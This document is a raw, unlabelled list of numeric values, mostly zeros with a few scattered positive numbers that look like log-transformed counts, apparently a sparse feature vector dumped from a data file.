0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.059123195581797, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.723585101952381, 1.6094379124341003, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.160336650881089, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.178053830347946, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 3.5263605246161616, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.976733742420574, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.93848385770662, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9120230054281455, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 3.044522437723423, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 